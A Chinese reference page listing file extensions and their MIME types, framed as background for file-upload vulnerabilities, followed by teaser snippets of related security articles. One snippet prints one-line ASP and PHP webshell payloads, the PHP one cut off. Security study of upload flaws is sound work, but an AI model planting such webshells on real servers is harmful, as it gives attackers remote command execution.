常见的MIME类型

  超文本标记语言文本 .html,.html text/html
  普通文本 .txt text/plain
  RTF文本 .rtf application/rtf
  GIF图形 .gif image/gif
  JPEG图形 .jpeg,.jpg image/jpeg
  au声音文件 .au audio/basic
  MIDI音乐文件 mid,.midi audio/midi,audio/x-midi
  RealAudio音乐文件 .ra, .ram audio/x-pn-realaudio
  MPEG文件 .mpg,.mpeg video/mpeg
  AVI文件 .avi video/x-msvideo
  GZIP文件 .gz application/x-gzip
  TAR文件 .tar application/x-tar

格式前面为后辍名,后面为对应的MIME型(例如:rar application/x-rar-compressed 表示.RAR对应的是application/x-rar-compressed )
  application/vnd.lotus-1-2-3
  3gp video/3gpp
  aab application/x-authoware-bin
  aam application/x-authoware-map
  aas application/x-authoware-seg
  ai application/postscript
  aif audio/x-aiff
  aifc audio/x-aiff
  aiff audio/x-aiff
  als audio/X-Alpha5
  amc application/x-mpeg
  ani application/octet-stream
  asc text/plain
  asd application/astound
  asf video/x-ms-asf
  asn application/astound
  asp application/x-asap
  asx video/x-ms-asf
  au audio/basic
  avb application/octet-stream
  avi video/x-msvideo
  awb audio/amr-wb
  bcpio application/x-bcpio
  bin application/octet-stream
  bld application/bld
  bld2 application/bld2
  bmp application/x-MS-bmp
  bpk application/octet-stream
  bz2 application/x-bzip2
  cal image/x-cals
  ccn application/x-cnc
  cco application/x-cocoa
  cdf application/x-netcdf
  cgi magnus-internal/cgi
  chat application/x-chat
  class application/octet-stream
  clp application/x-msclip
  cmx application/x-cmx
  co application/x-cult3d-object
  cod image/cis-cod
  cpio application/x-cpio
  cpt application/mac-compactpro
  crd application/x-mscardfile
  csh application/x-csh
  csm chemical/x-csml
  csml chemical/x-csml
  css text/css
  cur application/octet-stream
  dcm x-lml/x-evm
  dcr application/x-director
  dcx image/x-dcx
  dhtml text/html
  dir application/x-director
  dll application/octet-stream
  dmg application/octet-stream
  dms application/octet-stream
  doc application/msword
  dot application/x-dot
  dvi application/x-dvi
  dwf drawing/x-dwf
  dwg application/x-autocad
  dxf application/x-autocad
  dxr application/x-director
  ebk application/x-expandedbook
  emb chemical/x-embl-dl-nucleotide
  embl chemical/x-embl-dl-nucleotide
  eps application/postscript
  eri image/x-eri
  es audio/echospeech
  esl audio/echospeech
  etc application/x-earthtime
  etx text/x-setext
  evm x-lml/x-evm
  evy application/x-envoy
  exe application/octet-stream
  fh4 image/x-freehand
  fh5 image/x-freehand
  fhc image/x-freehand
  fif image/fif
  fm application/x-maker
  fpx image/x-fpx
  fvi video/isivideo
  gau chemical/x-gaussian-input
  gca application/x-gca-compressed
  gdb x-lml/x-gdb
  gif image/gif
  gps application/x-gps
  gtar application/x-gtar
  gz application/x-gzip
  hdf application/x-hdf
  hdm text/x-hdml
  hdml text/x-hdml
  hlp application/winhlp
  hqx application/mac-binhex40
  htm text/html
  html text/html
  hts text/html
  ice x-conference/x-cooltalk
  ico application/octet-stream
  ief image/ief
  ifm image/gif
  ifs image/ifs
  imy audio/melody
  ins application/x-NET-Install
  ips application/x-ipscript
  ipx application/x-ipix
  it audio/x-mod
  itz audio/x-mod
  ivr i-world/i-vrml
  j2k image/j2k
  jad text/vnd.sun.j2me.app-descriptor
  jam application/x-jam
  jar application/java-archive
  jnlp application/x-java-jnlp-file
  jpe image/jpeg
  jpeg image/jpeg
  jpg image/jpeg
  jpz image/jpeg
  js application/x-javascript
  jwc application/jwc
  kjx application/x-kjx
  lak x-lml/x-lak
  latex application/x-latex
  lcc application/fastman
  lcl application/x-digitalloca
  lcr application/x-digitalloca
  lgh application/lgh
  lha application/octet-stream
  lml x-lml/x-lml
  lmlpack x-lml/x-lmlpack
  lsf video/x-ms-asf
  lsx video/x-ms-asf
  lzh application/x-lzh
  m13 application/x-msmediaview
  m14 application/x-msmediaview
  m15 audio/x-mod
  m3u audio/x-mpegurl
  m3url audio/x-mpegurl
  ma1 audio/ma1
  ma2 audio/ma2
  ma3 audio/ma3
  ma5 audio/ma5
  man application/x-troff-man
  map magnus-internal/imagemap
  mbd application/mbedlet
  mct application/x-mascot
  mdb application/x-msaccess
  mdz audio/x-mod
  me application/x-troff-me
  mel text/x-vmel
  mi application/x-mif
  mid audio/midi
  midi audio/midi
  mif application/x-mif
  mil image/x-cals
  mio audio/x-mio
  mmf application/x-skt-lbs
  mng video/x-mng
  mny application/x-msmoney
  moc application/x-mocha
  mocha application/x-mocha
  mod audio/x-mod
  mof application/x-yumekara
  mol chemical/x-mdl-molfile
  mop chemical/x-mopac-input
  mov video/quicktime
  movie video/x-sgi-movie
  mp2 audio/x-mpeg
  mp3 audio/x-mpeg
  mp4 video/mp4
  mpc application/vnd.mpohun.certificate
  mpe video/mpeg
  mpeg video/mpeg
  mpg video/mpeg
  mpg4 video/mp4
  mpga audio/mpeg
  mpn application/vnd.mophun.application
  mpp application/vnd.ms-project
  mps application/x-mapserver
  mrl text/x-mrml
  mrm application/x-mrm
  ms application/x-troff-ms
  mts application/metastream
  mtx application/metastream
  mtz application/metastream
  mzv application/metastream
  nar application/zip
  nbmp image/nbmp
  nc application/x-netcdf
  ndb x-lml/x-ndb
  ndwn application/ndwn
  nif application/x-nif
  nmz application/x-scream
  nokia-op-logo image/vnd.nok-oplogo-color
  npx application/x-netfpx
  nsnd audio/nsnd
  nva application/x-neva1
  oda application/oda
  oom application/x-AtlasMate-Plugin
  pac audio/x-pac
  pae audio/x-epac
  pan application/x-pan
  pbm image/x-portable-bitmap
  pcx image/x-pcx
  pda image/x-pda
  pdb chemical/x-pdb
  pdf application/pdf
  pfr application/font-tdpfr
  pgm image/x-portable-graymap
  pict image/x-pict
  pm application/x-perl
  pmd application/x-pmd
  png image/png
  pnm image/x-portable-anymap
  pnz image/png
  pot application/vnd.ms-powerpoint
  ppm image/x-portable-pixmap
  pps application/vnd.ms-powerpoint
  ppt application/vnd.ms-powerpoint
  pqf application/x-cprplayer
  pqi application/cprplayer
  prc application/x-prc
  proxy application/x-ns-proxy-autoconfig
  ps application/postscript
  ptlk application/listenup
  pub application/x-mspublisher
  pvx video/x-pv-pvx
  qcp audio/vnd.qcelp
  qt video/quicktime
  qti image/x-quicktime
  qtif image/x-quicktime
  r3t text/vnd.rn-realtext3d
  ra audio/x-pn-realaudio
  ram audio/x-pn-realaudio
  rar application/x-rar-compressed
  ras image/x-cmu-raster
  rdf application/rdf+xml
  rf image/vnd.rn-realflash
  rgb image/x-rgb
  rlf application/x-richlink
  rm audio/x-pn-realaudio
  rmf audio/x-rmf
  rmm audio/x-pn-realaudio
  rmvb audio/x-pn-realaudio
  rnx application/vnd.rn-realplayer
  roff application/x-troff
  rp image/vnd.rn-realpix
  rpm audio/x-pn-realaudio-plugin
  rt text/vnd.rn-realtext
  rte x-lml/x-gps
  rtf application/rtf
  rtg application/metastream
  rtx text/richtext
  rv video/vnd.rn-realvideo
  rwc application/x-rogerwilco
  s3m audio/x-mod
  s3z audio/x-mod
  sca application/x-supercard
  scd application/x-msschedule
  sdf application/e-score
  sea application/x-stuffit
  sgm text/x-sgml
  sgml text/x-sgml
  sh application/x-sh
  shar application/x-shar
  shtml magnus-internal/parsed-html
  shw application/presentations
  si6 image/si6
  si7 image/vnd.stiwap.sis
  si9 image/vnd.lgtwap.sis
  sis application/vnd.symbian.install
  sit application/x-stuffit
  skd application/x-Koan
  skm application/x-Koan
  skp application/x-Koan
  skt application/x-Koan
  slc application/x-salsa
  smd audio/x-smd
  smi application/smil
  smil application/smil
  smp application/studiom
  smz audio/x-smd
  snd audio/basic
  spc text/x-speech
  spl application/futuresplash
  spr application/x-sprite
  sprite application/x-sprite
  spt application/x-spt
  src application/x-wais-source
  stk application/hyperstudio
  stm audio/x-mod
  sv4cpio application/x-sv4cpio
  sv4crc application/x-sv4crc
  svf image/vnd
  svg image/svg-xml
  svh image/svh
  svr x-world/x-svr
  swf application/x-shockwave-flash
  swfl application/x-shockwave-flash
  t application/x-troff
  tad application/octet-stream
  talk text/x-speech
  tar application/x-tar
  taz application/x-tar
  tbp application/x-timbuktu
  tbt application/x-timbuktu
  tcl application/x-tcl
  tex application/x-tex
  texi application/x-texinfo
  texinfo application/x-texinfo
  tgz application/x-tar
  thm application/vnd.eri.thm
  tif image/tiff
  tiff image/tiff
  tki application/x-tkined
  tkined application/x-tkined
  toc application/toc
  toy image/toy
  tr application/x-troff
  trk x-lml/x-gps
  trm application/x-msterminal
  tsi audio/tsplayer
  tsp application/dsptype
  tsv text/tab-separated-values
  tsv text/tab-separated-values
  ttf application/octet-stream
  ttz application/t-time
  txt text/plain
  ult audio/x-mod
  ustar application/x-ustar
  uu application/x-uuencode
  uue application/x-uuencode
  vcd application/x-cdlink
  vcf text/x-vcard
  vdo video/vdo
  vib audio/vib
  viv video/vivo
  vivo video/vivo
  vmd application/vocaltec-media-desc
  vmf application/vocaltec-media-file
  vmi application/x-dreamcast-vms-info
  vms application/x-dreamcast-vms
  vox audio/voxware
  vqe audio/x-twinvq-plugin
  vqf audio/x-twinvq
  vql audio/x-twinvq
  vre x-world/x-vream
  vrml x-world/x-vrml
  vrt x-world/x-vrt
  vrw x-world/x-vream
  vts workbook/formulaone
  wav audio/x-wav
  wax audio/x-ms-wax
  wbmp image/vnd.wap.wbmp
  web application/vnd.xara
  wi image/wavelet
  wis application/x-InstallShield
  wm video/x-ms-wm
  wma audio/x-ms-wma
  wmd application/x-ms-wmd
  wmf application/x-msmetafile
  wml text/vnd.wap.wml
  wmlc application/vnd.wap.wmlc
  wmls text/vnd.wap.wmlscript
  wmlsc application/vnd.wap.wmlscriptc
  wmlscript text/vnd.wap.wmlscript
  wmv audio/x-ms-wmv
  wmx video/x-ms-wmx
  wmz application/x-ms-wmz
  wpng image/x-up-wpng
  wpt x-lml/x-gps
  wri application/x-mswrite
  wrl x-world/x-vrml
  wrz x-world/x-vrml
  ws text/vnd.wap.wmlscript
  wsc application/vnd.wap.wmlscriptc
  wv video/wavelet
  wvx video/x-ms-wvx
  wxl application/x-wxl
  x-gzip application/x-gzip
  xar application/vnd.xara
  xbm image/x-xbitmap
  xdm application/x-xdma
  xdma application/x-xdma
  xdw application/vnd.fujixerox.docuworks
  xht application/xhtml+xml
  xhtm application/xhtml+xml
  xhtml application/xhtml+xml
  xla application/vnd.ms-excel
  xlc application/vnd.ms-excel
  xll application/x-excel
  xlm application/vnd.ms-excel
  xls application/vnd.ms-excel
  xlt application/vnd.ms-excel
  xlw application/vnd.ms-excel
  xm audio/x-mod
  xml text/xml
  xmz audio/x-mod
  xpi application/x-xpinstall
  xpm image/x-xpixmap
  xsit text/xml
  xsl text/xml
  xul text/xul
  xwd image/x-xwindowdump
  xyz chemical/x-pdb
  yz1 application/x-yz1
  z application/x-compress
  zac application/x-zaurus-zac
  zip application/zip

上传漏洞之常见MIME类型的更多相关文章

  1. 基于 java 【Web安全】文件上传漏洞及目录遍历攻击

    前言:web安全之文件上传漏洞,顺带讲一下目录遍历攻击.本文基于 java 写了一个示例. 原理 在上网的过程中,我们经常会将一些如图片.压缩包之类的文件上传到远端服务器进行保存.文件上传攻击指的是恶 ...

  2. 任意文件上传漏洞syr

    任意文件上传漏洞 先来几个一句话木马看看 <%execute(request("value"))%> #asp木马 <?php eval($_POST[" ...

  3. WEB安全:文件上传漏洞

    文件上传漏洞过程 用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力. 一般的情况有: 上传文件WEB脚本语言,服务器的WEB容器解释并执行了用户上传的脚本,导致代码执行: ...

  4. 上传漏洞总结-upload-labs

    介绍: Upload-labs是一个所有类型的上传漏洞的靶场 项目地址:https://github.com/c0ny1/upload-labs 思维导图: 小试牛刀: Pass-01 客户端js检查 ...

  5. 初级安全入门—— WEBshell与文件上传漏洞

    概念介绍 WebShell网页木马文件 最常见利用文件上传漏洞的方法就是上传网站木马(WebShell)文件,根据开发语言的不同又分为ASP木马.PHP木马.JSP木马等,该木马利用了脚本语言中的系统 ...

  6. web安全之文件上传漏洞攻击与防范方法

    一. 文件上传漏洞与WebShell的关系 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行.这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等.这种攻击方式是最为直接和有效 ...

  7. WEB服务端安全---文件上传漏洞

    1.简述 文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务端命令的能力.这种攻击方式是最直接和有效的,而且互联网中我们经常会用到文件上传功能,它本身是没有问题的,正常的业 ...

  8. 上传漏洞科普[1]-文件上传表单是Web安全主要威胁

    为了让最终用户将文件上传到您的网站,就像是给危及您的服务器的恶意用户打开了另一扇门.即便如此,在今天的现代互联网的Web应用程序,它是一种 常见的要求,因为它有助于提高您的业务效率.在Facebook ...

  9. 文件上传漏洞(pikachu)

    文件上传漏洞 文件上传功能在web应用系统很常见,比如很多网站注册的时候需要上传头像,附件等等.当用户点击上传按钮后,后台会对上传的文件进行判断,比如是否是指定的类型.后缀名.大小等等,然后将其按照设 ...

随机推荐

  1. jsp学习:jsp学习阶段性总结2019.9.21

    Jsp学习 jsp语法格式: 脚本程序:<% 代码片段 %> jsp声明:<%! declaration; [ declaration; ]+ ... %> 表达式:<% ...

  2. jenkins在windows上自动化部署.Net(.Net Core)项目

    前言 什么是持续集成呢?Continuous integration(CI).持续集成是一种软件开发实践,即团队开发成员经常集成他们的工作,通常每个成员至少集成一次,也就意味着每天可能会发生多次集成. ...

  3. CentOS部署Harbor镜像仓库

    关于Harbor Harbor是用于存储和分发Docker镜像的镜像仓库服务,相比Docker Registry,Harbor在安全.标识.管理等方面做了增强,更适合企业使用: 官方网站:https: ...

  4. Hadoop 之 分布式缓存的原理和方法——DistributedCache

    1.什么时Hadoop的分布式缓存 答:在执行MapReduce时,可能Mapper之间需要共享一些信息,如果信息量不大,可以将其从HDFS中加载到内存中,这就是Hadoop分布式缓存机制. 2.如何 ...

  5. mybatis无法给带有下划线属性赋值问题

    https://blog.csdn.net/qq_33768099/article/details/69569561

  6. at org.apache.jsp.WEB_002dINF.pages.login_jsp._jspInit( login_jsp.java:22)

    SEVERE: Servlet.service() for servlet jsp threw exception java.lang.NullPointerException at org.apac ...

  7. 一个简单的jquery ajax表单提交 带数据校验 layer弹框提示

    <input type="hidden" id="url" value="index.php"/> <form id=&q ...

  8. kafka报错:Invalid message size: 0

    现象 1.kafka topic 部分分区积压 2.问题kafka 节点上一直报错:java.lang.IllegalStateException: Invalid message size: 0 [ ...

  9. 使用JSP+Servlet+Jdbc+Echatrs实现对豆瓣电影Top250的展示

    使用JSP+Servlet+Jdbc+Echatrs实现对豆瓣电影Top250的展示 写在前面: 有的小伙伴,会吐槽啦,你这个标题有点长的啊.哈哈 ,好像是的!不过,这个也是本次案例中使用到的关键技术 ...

  10. jQuery常用方法(五)-jQuery CSS

    JQuery CSS 方法说明 css( name ) 访问第一个匹配元素的样式属性. css( properties ) 把一个"名/值对"对象设置为所有匹配元素的样式属性. $ ...